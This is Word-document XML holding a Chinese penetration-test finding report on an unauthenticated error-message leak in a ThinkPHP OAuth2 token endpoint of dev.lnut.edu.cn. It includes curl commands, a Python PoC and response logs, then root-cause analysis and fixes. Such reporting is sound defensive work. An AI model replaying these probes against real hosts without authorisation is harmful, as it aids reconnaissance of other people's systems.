      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">|  |  |  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 安全风险状况说明  | |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 低危漏洞 | 对系统造成较小的影响，攻击成本高，攻击场景较为苛刻，不会直接影响到系统的正常运行，攻击者可能无法通过该漏洞获得权限。  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 中危漏洞 | 对系统造成一般的影响，攻击成本一般，在特定场景下将可影响系统的正常运行，攻击者需要配合其他安全漏洞方可间接获得权限。  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">| 高危漏洞 | 对系统造成严重的影响，攻击成本低，一般情况下可直接利用而无需特定场景和要求，攻击者可直接利用该漏洞获得权限。  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">[LOW] 统一身份认证 OAuth2 令牌端点未认证错误信息回显（ThinkPHP ORM where 表达式报错泄露内部实现）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **类别**：信息泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **严重等级**：low</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **状态**：pending</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **所属任务**：靶标是dev.lnut.edu.cn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **发现时间**：2026-09-18 20:19:41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **生成时间**：2026-09-24 02:10:18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">POST https://dev.lnut.edu.cn/index.php/auth/oauth/access_token 在未认证状态下，对数组型参数（client_id[]、code[]）返回 HTTP 200 并把 ThinkPHP ORM 的 where 表达式报错原文回显给调用方（"where express error:=array (\n  0 =&gt; 'x',\n)"），泄露 ORM/框架内部错误处理细节与参数被原样传入查询构造器的行为，属错误信息泄露（CWE-209）；不构成 SQL 注入（普通字符串参数被安全绑定）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">证据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">无需认证。PoC（HTTP/HTTPS 直连，无代理）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">curl.exe --noproxy "*" -k -i -X POST "https://dev.lnut.edu.cn/index.php/auth/oauth/access_token" -d "grant_type=client_credentials&amp;client_id[]=x&amp;client_secret=a"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">响应：HTTP/1.1 200 OK，Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{"code":0,"data":false,"message":"where express error:=array (\n  0 =&gt; 'x',\n)","timestamp":1789733959,"error":"logic error"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">变体：-d "grant_type=authorization_code&amp;client_id=&amp;client_secret=&amp;code[]=x" → 同样 200 + "where express error:=array (\n  0 =&gt; 'x',\n)"；-d "...&amp;code=a&amp;client_id[]=y" → "where express error:=array (\n  0 =&gt; 'y',\n)"（回显我们提交的数组元素）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">补充：普通字符串（client_id=aaa）被 ORM 安全绑定，返回 200 service_not_found "应用未注册或地址不匹配"，不存在 SQL 注入；本问题仅为错误信息回显。未采集到流量记录（该目标无 traffic 数据），证据为上述可重复的命令输出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">详细报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">统一身份认证 OAuth2 令牌端点未认证错误信息回显（ThinkPHP ORM where 表达式报错泄露内部实现）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- 漏洞类别：信息泄露（CWE-209 通过错误消息泄露敏感信息；CWE-200 敏感信息暴露）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- 严重等级：**低危（Low）**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- 影响资产：`https://dev.lnut.edu.cn/index.php/auth/oauth/access_token`（统一身份认证 OAuth2 令牌端点）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- 认证要求：无需任何认证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">统一身份认证 OAuth2 令牌端点 `POST /index.php/auth/oauth/access_token` 在**未认证**状态下，一旦收到**数组型参数**（如 `client_id[]`、`code[]`），服务端会把该参数原样作为查询条件传入 ThinkPHP ORM 的 `where` 表达式，导致 ORM 抛出异常；异常原文被作为业务响应 `message` 明文回显给调用方，内容形如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">where express error:=array (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0 =&gt; 'x',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">回显中包含 ThinkPHP 内部错误措辞、`where` 表达式报错细节，以及**调用方提交的原始数组内容**，泄露了框架/ORM 内部实现与"参数被原样透传给查询构造器"的行为。经验证，普通字符串参数被 ORM 安全绑定，**不构成 SQL 注入**，本问题性质为错误信息泄露。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">影响与危害</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **内部实现泄露**：向未认证访问者暴露后端使用 ThinkPHP ORM、`where` 表达式解析器对数组入参的处理路径与报错原文，有助于攻击者推断技术栈、ORM 版本行为及代码结构，为后续针对性攻击（模板注入、反序列化、已知 ThinkPHP 漏洞指纹匹配）提供情报。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **参数透传行为暴露**：报错原样回显攻击者提交的数组元素，明确显示用户输入直接进入查询构造器，可作为进一步探测查询构造逻辑的"回显式 oracle"。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **未构成直接数据泄露或注入**：实测普通字符串 `client_id=aaa` 被 ORM 安全绑定，返回业务错误 `service_not_found "应用未注册或地址不匹配"`，无 SQL 语法/注入迹象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- **等级判定**：无凭据即可触发、可稳定复现，但泄露内容仅为内部错误文案与框架实现细节，未直接导致数据泄露、认证绕过或 RCE，故定为**低危**。其价值主要在于信息收集与作为其它漏洞链路的辅助情报。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">受影响范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- 端点：`POST https://dev.lnut.edu.cn/index.php/auth/oauth/access_token`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- 受影响参数：任意会被传入 ORM 查询构造器的数组型参数，已确认：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- `client_id[]`（配合 `grant_type=client_credentials`）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- `code[]`（配合 `grant_type=authorization_code`）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- 触发条件：以 `application/x-www-form-urlencoded` 提交形如 `name[]=value` 的数组参数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">- 影响面：所有能够访问该域名的未认证网络位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1. 直接向令牌端点发送带数组型参数的 POST 请求（无需登录、无需代理）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">curl.exe --noproxy "*" -k -i -X POST \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"https://dev.lnut.edu.cn/index.php/auth/oauth/access_token" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-d "grant_type=client_credentials&amp;client_id[]=x&amp;client_secret=a"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2. 观察响应：HTTP 200，`Content-Type: application/json`，`message` 字段为 ThinkPHP ORM `where` 表达式报错原文，并**回显所提交的数组元素**：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{"code":0,"data":false,"message":"where express error:=array (\n  0 =&gt; 'x',\n)","timestamp":1789733959,"error":"logic error"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3. 变体验证"参数被原样透传"：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">code[] 触发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">curl.exe --noproxy "*" -k -X POST \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"https://dev.lnut.edu.cn/index.php/auth/oauth/access_token" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-d "grant_type=authorization_code&amp;client_id=&amp;client_secret=&amp;code[]=x"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">回显不同数组元素 y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">curl.exe --noproxy "*" -k -X POST \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"https://dev.lnut.edu.cn/index.php/auth/oauth/access_token" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-d "grant_type=authorization_code&amp;client_id=&amp;client_secret=&amp;code=a&amp;client_id[]=y"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">两次均返回 HTTP 200 与 `where express error:=array ( 0 =&gt; 'x'/'y' )`，其中元素值随提交内容变化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4. 对照（证明非 SQL 注入）：提交普通字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">curl.exe --noproxy "*" -k -X POST \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"https://dev.lnut.edu.cn/index.php/auth/oauth/access_token" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-d "grant_type=client_credentials&amp;client_id=aaa&amp;client_secret=a"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">返回 HTTP 200 `service_not_found "应用未注册或地址不匹配"`，参数被安全绑定，无报错、无注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">证据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">原始命令输出（意图 352 执行记录，`errleak.txt`）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">REQ {'grant_type': 'client_credentials', 'client_id[]': 'x', 'client_secret': 'a'}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">RESP 200 b'{"code":0,"data":false,"message":"where express error:=array (\\n  0 =&gt; \'x\',\\n)","timestamp":1789733959,"error":"logic error"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">REQ {'grant_type': 'authorization_code', 'client_id': '', 'client_secret': '', 'code[]': 'x'}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">RESP 200 b'{"code":0,"data":false,"message":"where express error:=array (\\n  0 =&gt; \'x\',\\n)","timestamp":1789733960,"error":"logic error"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">REQ {'grant_type': 'authorization_code', 'client_id': '', 'client_secret': '', 'code': 'a', 'client_id[]': 'y'}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">RESP 200 b'{"code":0,"data":false,"message":"where express error:=array (\\n  0 =&gt; \'y\',\\n)","timestamp":1789733960,"error":"logic error"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">对照证据（同一端点、普通字符串入参，被安全绑定）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`client_id=''+secret=''` → HTTP400 `Missing parameter: "code" is required`；`client_id=aaa` → HTTP200 `service_not_found "应用未注册或地址不匹配"`。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">**流量证据说明**：本次未绑定流量。经 `traffic_search`（host=`dev.lnut.edu.cn`、`dev.lnut.edu.cn:443`，含 `access_token`/`client_secret`/`oauth` 等关键词）多次检索，该目标**无已采集的 traffic 记录**（`finding_id=61` 的绑定清单为空，version=0）。故本报告依据上述可重复执行的命令输出（真实回显报文）作为证据；如需 HTTP 层固证，可在具备采集能力的网络位置按"复现步骤"重放并抓包。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PoC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">以下脚本可完整复现该错误信息回显，并对比性验证"普通字符串被安全绑定、无 SQL 注入"：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">-*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">import urllib3, requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">urllib3.disable_warnings()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">s = requests.Session()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">s.trust_env = False          # 直连，绕过不可用代理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">s.verify = False</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">U = "https://dev.lnut.edu.cn/index.php/auth/oauth/access_token"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">cases = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">数组型参数 -&gt; 触发 ORM where 报错回显</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{"grant_type": "client_credentials", "client_id[]": "x", "client_secret": "a"},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{"grant_type": "authorization_code", "client_id": "", "client_secret": "", "code[]": "x"},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{"grant_type": "authorization_code", "client_id": "", "client_secret": "", "code": "a", "client_id[]": "y"},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">对照：普通字符串 -&gt; 被安全绑定，无报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">{"grant_type": "client_credentials", "client_id": "aaa", "client_secret": "a"},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">for d in cases:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">r = s.post(U, data=d,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">headers={"Content-Type": "application/x-www-form-urlencoded",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"User-Agent": "Mozilla/5.0"},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">timeout=15, allow_redirects=False)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">print("REQ ", d)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">print("RESP", r.status_code, r.content.decode("utf-8", "replace")[:400])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">print()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">```</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">运行方式：`python poc.py`（需 `requests`）。预期前 3 例返回 `where express error:=array (...)` 且回显提交的数组元素，第 4 例返回 `service_not_found "应用未注册或地址不匹配"`。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">根因分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1. **异常信息直接回显**：控制器/OAuth 服务在捕获 ORM 异常后，把异常 `getMessage()` 原文直接写入响应体的 `message` 字段（而非记录到服务端日志并返回通用错误码），导致 ThinkPHP 内部错误措辞与堆栈语义外泄。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2. **数组入参未做类型校验**：令牌端点未对 `client_id`/`code` 等参数强制为标量字符串，PHP 会自动把 `client_id[]=x` 解析为数组；该数组被原样作为 `where` 条件值传入 ORM，触发 ThinkPHP `where` 表达式对数组值的解析异常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3. **框架错误处理未在生产环境收敛**：ThinkPHP 的异常/错误处理未按生产环境配置为"隐藏内部细节、返回统一的业务错误"，使底层 ORM 错误得以穿透到 API 层。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1. **统一异常出口，禁止回显内部错误**：在全局异常处理器（或该控制器）中拦截 ORM/框架异常，仅返回稳定的业务错误码与提示（如 `{"error":"invalid_request"}`），把异常的完整信息写入服务端日志/审计系统；生产环境确保 `app_debug=false`、关闭详细错误页。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2. **参数类型强校验**：对 `grant_type`、`client_id`、`client_secret`、`code`、`redirect_uri` 等使用 `is_string()`/`filter_var()` 校验，拒绝数组及其它非期望类型（如返回 400 `invalid_request`），避免其进入查询构造器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">3. **规范 ORM 调用**：查询条件统一使用参数绑定/数组条件的安全构造方式，避免把用户输入作为 `where` 表达式的原始值；对集合类条件显式做 `whereIn` 等安全封装。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">4. **错误信息最小化**：对外错误文案统一化，避免暴露框架名称、`where` 表达式、类路径（该端点其它路径已泄露 `app\auth\controller\Oauth-&gt;X()` 类路径，应一并收敛）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">5. **回归与监控**：为令牌端点补充针对数组/畸形入参的自动化用例；对返回体中出现框架关键字（如 `express error`、`ThinkPHP`）配置告警，及时发现新的信息泄露点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E920F60">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4880"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="138"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId7" w:type="first"/>
      <w:footerReference r:id="rId10" w:type="first"/>
      <w:headerReference r:id="rId5" w:type="default"/>
      <w:footerReference r:id="rId8" w:type="default"/>
      <w:headerReference r:id="rId6" w:type="even"/>
      <w:footerReference r:id="rId9" w:type="even"/>
      <w:footnotePr>
        <w:numFmt w:val="decimalEnclosedCircleChinese"/>
        <w:numRestart w:val="eachPage"/>
      </w:footnotePr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="2098" w:right="1701" w:bottom="1191" w:left="1701" w:header="1361" w:footer="680"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D6722">
    <w:pPr>
      <w:pStyle w:val="11"/>
      <w:rPr>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0">
          <wp:extent cx="5400040" cy="2794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400040" cy="28521"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
    <w:r>
